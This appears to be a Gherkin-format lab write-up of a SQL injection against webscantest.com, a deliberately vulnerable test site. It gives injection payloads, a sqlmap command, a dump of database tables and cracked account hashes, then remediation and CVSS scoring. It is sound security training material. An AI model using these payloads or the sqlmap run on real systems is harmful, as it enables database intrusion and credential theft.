## Version 1.4.1
## language: en

Feature: SQL Injection
  TOE:
    web-scanner-test-site
  Category:
    Input Validation
  Location:
    http://www.webscantest.com/
  CWE:
    CWE-89: Improper Neutralization of Special Elements used in an SQL Command
  Rule:
    REQ.173 Discard unsafe inputs
  Goal:
    Perform a SQL injection attack
  Recommendation:
    Sanitize inputs that may contain special characters from the SQL syntax

  Background:
  Hacker's software:
    | <Software name>      | <Version> |
    | Kali Linux           | 5.4.0     |
    | Firefox              | 68.6.0esr |
    | Sqlmap               | 1.4.3     |
  TOE information:
    Given that I access the site at
    """
    http://www.webscantest.com/
    """
    Then I see an index of different hacking challenges

  Scenario: Normal use case
    Given that I choose a DB challenge under the URL
    """
    http://www.webscantest.com/datastore/search_double_by_name.php
    """
    Then I see a text box with a default input "Rake"
    When I submit the input
    Then the page shows me information about a product with that name

  Scenario: Static detection
    Given there is not access to the source code
    Then a static detection cannot be performed

  Scenario: Dynamic detection
    Given the input box I found in the page
    And that it expects strings to work properly
    When I use an integer as input
    Then I get the message
    """
    Invalid Product
    """
    When I try the payload
    """
    " or 1=1
    """
    Then I get the same message as before
    And I notice in the input field that a "\" appeared before the double quote
    And I realize that there must be some kind of escaping done on the server
    When I try using the same payload but with a single quote
    Then I get the message
    """
    Error 1064: You have an error in your SQL syntax; check the manual that
    corresponds to your MySQL server version for the right syntax to use
    near ''' at line 1 of SELECT * FROM inventory WHERE name = '' or 1=1'
    """
    And I realize that the field may be vulnerable to SQL injection attacks

  Scenario: Exploitation
    Given the error message obtained previously
    And I notice the server encloses my input in single quotes
    When I use the payload
    """
    ' or 1=1--
    """
    Then I manage to exploit the field and get all the products information
    And I decide to use "sqlmap" to get more interesting information
    When I launch an attack using "sqlmap"
    """
    sqlmap -u http://www.webscantest.com/datastore/search_double_by_name.php --data name=Rake -p name
    """
    Then I can find information about the database name, tables and more
    """
    current database: 'webscantest'

    Tables
    +-----------+
    | accounts  |
    | inventory |
    | orders    |
    | products  |
    +-----------+

    Table: accounts
    +--------+--------------+
    | Column | Type         |
    +--------+--------------+
    | id     | int(50)      |
    | fname  | varchar(50)  |
    | lname  | varchar(100) |
    | passwd | varchar(100) |
    | uname  | varchar(50)  |
    +--------+--------------+

    +----------+---------------------------------------------+
    | uname    | passwd                                      |
    +----------+---------------------------------------------+
    | admin    | 21232f297a57a5a743894a0e4a801fc3 (admin)    |
    | testuser | 179ad45c6ce2cb97cf1029e212046e81 (testpass) |
    +----------+---------------------------------------------+
    """

  Scenario: Remediation
  Sanitize inputs that may contain special characters in the SQL syntax
    Given that the inputs are validated before constructing the SQL statement
    When I use the previously successful query
    """
    ' or 1=1--
    """
    Then I get an "Invalid Product" response since it does not match any product

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.5/10 (High) - AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.2/10 (High) - E:H/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    8.9/10 (High) - CR:L/IR:L/AR:L/

  Scenario: Correlations
    No correlations have been found to this date 2020-04-15
